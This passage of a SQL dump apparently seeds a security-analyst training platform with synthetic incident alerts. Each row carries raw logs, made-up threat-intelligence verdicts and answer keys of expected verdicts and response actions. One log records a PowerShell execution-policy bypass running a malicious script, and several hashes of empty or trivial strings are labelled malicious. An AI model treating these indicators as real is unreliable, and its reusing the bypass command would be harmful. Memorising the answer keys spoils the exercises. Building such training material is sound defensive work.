scan\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence feed\",\"verdict\":\"malicious\",\"details\":\"Known attacker IP involved in previous SCADA attacks\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"5d41402abc4b2a76b9719d911017c592\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware database\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malicious script used in SCADA disruptions\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"malicious_script.sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"file analysis\",\"verdict\":\"malicious\",\"details\":\"Script designed to disrupt power distribution systems\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"user audit logs\",\"verdict\":\"suspicious\",\"details\":\"User account used without authorization\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (273, 'Malware Detected: Suspicious Process Execution on Host', 'high', 'CrowdStrike', 'A suspicious process \'malware.exe\' was executed on the host \'INTERNAL-PC01\' originating from an external IP known for malicious activity. The hash of the file matches a known malware sample.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-11T14:30:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.5\",\"username\":\"jdoe\",\"hostname\":\"INTERNAL-PC01\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malware.exe\"}', '2025-12-31 13:30:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for malware distribution\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash matches known malware sample \'Trojan.Generic\'\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The alert is a true positive as the process executed matches a known malware signature and originates from a malicious IP. Immediate action is required to contain the threat.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (274, 'Phishing Attempt via Weaponized Job Offers', 'medium', 'Email Gateway', 'The Lazarus Group has sent a phishing email to a developer at the company, masquerading as a recruiter with a lucrative job offer. The email contains a malicious attachment designed to harvest credentials.', 'Phishing', 'T1566.001 - Spearphishing Attachment', 1, 'investigating', 34, '{\"timestamp\":\"2023-09-25T13:45:00Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.15\",\"email_from\":\"recruiter@example.com\",\"email_to\":\"dev.user@company.com\",\"subject\":\"Exciting Job Opportunity!\",\"attachment_name\":\"JobOffer.docm\",\"attachment_hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"action\":\"Email Received\"}', '2025-12-31 13:43:07', '2026-01-11 01:06:06', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with known phishing activities\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"recruiter@example.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Email domain has been reported in phishing campaigns\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"JobOffer.docm\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Document contains macros used for credential harvesting\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"d41d8cd98f00b204e9800998ecf8427e\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Known hash for malicious document containing macros\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Beginner', 'NULL', 1, 0, NULL), (275, 'Malicious Code Execution on Developer Systems', 'high', 'EDR', 'Malicious code executed on developer systems following a successful phishing attack, providing attackers access to the DeFi platform\'s development environment.', 'Malware', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-11T14:22:35Z\",\"event_id\":\"4567\",\"event_type\":\"process_creation\",\"user\":\"dev_user01\",\"source_ip\":\"192.168.1.45\",\"destination_ip\":\"203.0.113.5\",\"process_name\":\"powershell.exe\",\"command_line\":\"powershell.exe -ExecutionPolicy Bypass -File C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"additional_info\":{\"file_path\":\"C:\\\\Users\\\\dev_user01\\\\malicious_script.ps1\"}}', '2025-12-31 13:43:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"username\",\"value\":\"dev_user01\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"User account on the development system.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.45\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal IP of the developer\'s machine.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"malicious_script.ps1\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"PowerShell script used to execute malicious commands.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (276, 'Establishing Persistence and Lateral Movement', 'high', 'Network Traffic Analysis', 'Attackers are using compromised credentials to move laterally within the DeFi platform\'s network, aiming to escalate privileges and maintain access across critical systems.', 'Lateral Movement', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:23:45Z\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"10.0.0.5\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"method\":\"SMB\",\"file_transferred\":\"persistence_tool.exe\",\"hash\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"action\":\"Successful Authentication\",\"protocol\":\"SMB\",\"severity\":\"High\"}', '2025-12-31 13:43:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Internal IP associated with lateral movement activity.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal network logs\",\"verdict\":\"internal\",\"details\":\"Critical system targeted for lateral movement.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"threat intelligence\",\"verdict\":\"malicious\",\"details\":\"External IP known for malicious activities.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal user database\",\"verdict\":\"internal\",\"details\":\"Compromised user account used for unauthorized access.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"persistence_tool.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"malware analysis\",\"verdict\":\"malicious\",\"details\":\"File used for establishing persistence within the network.\"}},{\"id\":\"artifact_6\",\"type\":\"hash\",\"value\":\"3f5d8f3e5c4c4099d2a3f3a7b9b7b6f1\",\"is_critical\":true,\"osint_result\":{\"source\":\"hash lookup\",\"verdict\":\"malicious\",\"details\":\"Known hash associated with malware.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'intermediate', 'NULL', 1, 0, NULL); INSERT INTO `alerts` (`id`, `title`, `severity`, `source`, `details`, `alert_type`, `mitre_technique`, `real_world_example`, `status`, `assigned_to`, `raw_log`, `created_at`, `updated_at`, `playbook_solution`, `difficulty`, `path_code`, `min_level`, `is_ai_generated`, `sector_code`) VALUES (277, 'Cryptocurrency Exfiltration and Laundering', 'critical', 'Blockchain Analysis', 'The operation culminates in the transfer of $600 million worth of cryptocurrency from the DeFi platform’s wallets. The attackers employ mixer services to launder the funds, making tracking and recovery efforts challenging.', 'Exfiltration', 'T1567 - Exfiltration Over Web Service', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T03:45:30Z\",\"event_id\":\"evt-2023-cryptoxfil-004\",\"source_ip\":\"203.0.113.45\",\"internal_ip\":\"10.0.0.5\",\"transaction_id\":\"0x9f1b3e91e7b8f3c4c9f1a4a3d9b7b0d6\",\"transfer_amount\":\"600000000\",\"currency\":\"USD\",\"destination_address\":\"1MixerServiceX1yZ3w4V5\",\"hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"user\":\"attacker@malicious.com\",\"filename\":\"exfil_transaction_details.csv\"}', '2025-12-31 13:43:07', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known cybercrime activities.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP of compromised host.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"Blockchain Explorer\",\"verdict\":\"malicious\",\"details\":\"Hash used in fraudulent transaction.\"}},{\"id\":\"artifact_4\",\"type\":\"email\",\"value\":\"attacker@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Spamhaus\",\"verdict\":\"malicious\",\"details\":\"Email linked to multiple phishing campaigns.\"}},{\"id\":\"artifact_5\",\"type\":\"filename\",\"value\":\"exfil_transaction_details.csv\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Filename indicates potential data exfiltration.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Advanced', 'NULL', 1, 0, NULL), (278, 'Compromised Update Detected', 'high', 'Software Update Logs', 'A malicious DLL was detected within a signed update package of the server management software. The package was distributed to users, potentially granting attackers initial access.', 'Malware', 'T1195.002 - Supply Chain Compromise: Compromise Software Supply Chain', 1, 'new', NULL, '{\"timestamp\":\"2023-10-14T12:34:56Z\",\"event_id\":\"update_12345\",\"update_source\":\"server_mgmt_software\",\"update_version\":\"v3.2.1\",\"affected_component\":\"lib_mgmt.dll\",\"malicious_hash\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"signed_cert\":\"CN=ServerMgmt, O=TrustedSoftware Inc.\",\"source_ip\":\"192.168.1.15\",\"attacker_ip\":\"203.0.113.45\",\"user\":\"admin_user\",\"filename\":\"lib_mgmt.dll\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Database\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous cyber attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e5d8870e5bdd26602c622b7e5b0f6b4c\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash identified as part of a malware distribution campaign.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"lib_mgmt.dll\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Software Repository\",\"verdict\":\"internal\",\"details\":\"Filename matches legitimate component, but altered.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Database\",\"verdict\":\"internal\",\"details\":\"Authorized user for software management.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (279, 'Execution of Malicious Code', 'high', 'Endpoint Detection and Response (EDR)', 'Once the update is installed, the malicious DLL executes its payload, allowing the attacker to establish an initial presence within the network.', 'Execution', 'T1203: Exploitation for Client Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:47Z\",\"event_id\":\"EDR-EXEC-20231005-143\",\"hostname\":\"compromised-host-01\",\"user\":\"jdoe\",\"process_name\":\"rundll32.exe\",\"file_path\":\"C:\\\\Windows\\\\System32\\\\malicious.dll\",\"hash\":\"b1946ac92492d2347c6235b4d2611184\",\"internal_ip\":\"192.168.1.15\",\"external_ip\":\"203.0.113.45\",\"action\":\"Execute\",\"outcome\":\"Success\",\"additional_info\":\"The DLL was executed remotely via rundll32.exe, establishing a reverse shell.\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"b1946ac92492d2347c6235b4d2611184\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by multiple engines as a trojan.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AlienVault OTX\",\"verdict\":\"malicious\",\"details\":\"Known command and control server.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.dll\",\"is_critical\":true,\"osint_result\":{\"source\":\"Local Database\",\"verdict\":\"malicious\",\"details\":\"File associated with recent compromise attempts.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"User is a legitimate employee.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (280, 'Establish Persistence', 'high', 'Intrusion Detection System (IDS)', 'An advanced persistent threat actor has set up a backdoor to maintain access to compromised systems by creating a persistent service. This allows for continued unauthorized access even if initial malware is removed.', 'Persistence', 'T1547.001', 1, 'new', NULL, '{\"timestamp\":\"2023-09-14T02:45:12Z\",\"event_id\":\"12345678\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"192.168.1.10\",\"user\":\"admin_user\",\"action\":\"establish_persistence\",\"persistence_type\":\"service_creation\",\"service_name\":\"UpdateService\",\"service_exe\":\"C:\\\\Windows\\\\System32\\\\updater.exe\",\"file_hash\":\"abc123def4567890abc123def4567890\",\"status\":\"success\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"Known command and control server associated with multiple APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal server targeted by the attacker.\"}},{\"id\":\"artifact_4\",\"type\":\"hash\",\"value\":\"abc123def4567890abc123def4567890\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash associated with known malware samples.\"}},{\"id\":\"artifact_5\",\"type\":\"username\",\"value\":\"admin_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"clean\",\"details\":\"Legitimate user account used for unauthorized service creation.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (281, 'Lateral Movement and Data Exfiltration', 'high', 'Network Traffic Analysis', 'Detected lateral movement activities with potential data exfiltration attempts. Anomalous network traffic indicates movement from compromised host to sensitive data repositories.', 'Lateral Movement', 'T1021 - Remote Services', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:32:45Z\",\"event_id\":\"1002\",\"src_ip\":\"192.168.1.105\",\"dst_ip\":\"10.0.0.55\",\"attacker_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"file_accessed\":\"confidential_data.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"event_type\":\"network_traffic\",\"action\":\"exfiltration_attempt\"}', '2025-12-31 13:45:44', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.105\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Compromised internal host used for lateral movement.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network Monitoring\",\"verdict\":\"internal\",\"details\":\"Targeted internal server storing sensitive data.\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"External Threat Intelligence\",\"verdict\":\"malicious\",\"details\":\"Confirmed malicious IP associated with known threat actor.\"}},{\"id\":\"artifact_4\",\"type\":\"filename\",\"value\":\"confidential_data.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"File Integrity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"Sensitive file accessed during suspicious network activity.\"}},{\"id\":\"artifact_5\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"File Hash Database\",\"verdict\":\"clean\",\"details\":\"File hash matches known clean version.\"}},{\"id\":\"artifact_6\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":true,\"osint_result\":{\"source\":\"User Activity Monitoring\",\"verdict\":\"suspicious\",\"details\":\"User account potentially compromised for lateral movement.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', 'NULL', 1, 0, NULL), (282, 'Malware Detected via Suspicious Process Execution', 'high', 'CrowdStrike', 'A suspicious process \'malicious.exe\' was executed on the host \'DESKTOP-1234\'. The file hash is associated with known malware.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-15T14:32:21Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"192.168.1.50\",\"username\":\"jdoe\",\"hostname\":\"DESKTOP-1234\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 14:09:48', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address belonging to the organization\'s network.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"File hash is identified as a part of a known malware family.\"}},{\"id\":\"artifact_3\",\"type\":\"filename\",\"value\":\"malicious.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Process execution behavior is indicative of malware.\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process \'malicious.exe\' is executed from an internal machine and is linked to a known malware hash. Immediate isolation and further investigation are necessary.\"}', 'Intermediate', 'EDR', 1, 0, 'OT_ICS'), (283, 'Suspicious Network Connection from External IP Detected', 'high', 'Firewall', 'A network connection from an external IP was detected attempting to access an internal server. The connection was flagged due to a high number of failed login attempts.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"internal-server-01\",\"failed_attempts\":35}', '2026-01-01 01:58:11', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address belonging to the organization\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Common administrative account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The external IP has been involved in multiple brute force attacks, indicating malicious intent.\"}', 'Intermediate', 'SIEM', 1, 0, 'OT_ICS'), (284, 'Malware Detected via Suspicious Process Execution', 'critical', 'CrowdStrike', 'A suspicious process execution was detected on a host, linked to known malware activity. The process attempted to connect to a known malicious Command and Control server.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2023-10-12T16:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.23\",\"dst_ip\":\"198.51.100.17\",\"hostname\":\"workstation-07\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"process_name\":\"malicious.exe\"}', '2025-12-31 20:54:16', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"198.51.100.17\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"IP linked to Command and Control servers\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.23\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected workstation\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The process execution and connection to a known C2 server confirm malware infection.\"}', 'Advanced', 'EDR', 1, 0, 'OT_ICS'), (285, 'Spear-Phishing Email Campaign Detected', 'high', 'Email Gateway', 'APT28 initiates their campaign by sending carefully crafted spear-phishing emails to key personnel within political organizations, aiming to harvest credentials and gain a foothold in the network.', 'Phishing', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T08:47:23Z\",\"source_ip\":\"185.92.220.34\",\"destination_ip\":\"10.0.2.15\",\"email_subject\":\"Urgent: Review Attached Document\",\"sender_email\":\"john.doe@fakeorg.com\",\"recipient_email\":\"alice.smith@politicalorg.org\",\"attachment_filename\":\"Urgent_Document.pdf\",\"attachment_hash\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"malicious_link\":\"http://malicious-link.com/login\",\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"185.92.220.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"Reported for phishing activities.\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"john.doe@fakeorg.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"malicious\",\"details\":\"Known phishing sender.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Associated with phishing documents.\"}},{\"id\":\"artifact_4\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLhaus\",\"verdict\":\"malicious\",\"details\":\"Hosting phishing page.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'Intermediate', 'NULL', 1, 0, NULL), (286, 'Malicious Domain Infrastructure Identified', 'high', 'Firewall', 'APT28 has set up a credential harvesting operation using domains that mimic legitimate login portals. User traffic is being redirected to these domains following a successful phishing campaign. The captured credentials will allow the adversary to escalate their access within the network.', 'Credential Harvesting', 'T1566.002', 1, 'new', NULL, '{\"timestamp\":\"2023-10-15T14:22:35Z\",\"firewall_id\":\"FW123456\",\"src_ip\":\"10.14.22.5\",\"dst_ip\":\"203.0.113.45\",\"src_port\":\"443\",\"dst_port\":\"80\",\"action\":\"allow\",\"domain\":\"login-secure-portal.com\",\"url\":\"http://login-secure-portal.com/login\",\"user\":\"jdoe\",\"hash\":\"d41d8cd98f00b204e9800998ecf8427e\",\"file\":\"login_page.html\"}', '2025-12-31 15:17:10', '2026-01-11 01:09:19', 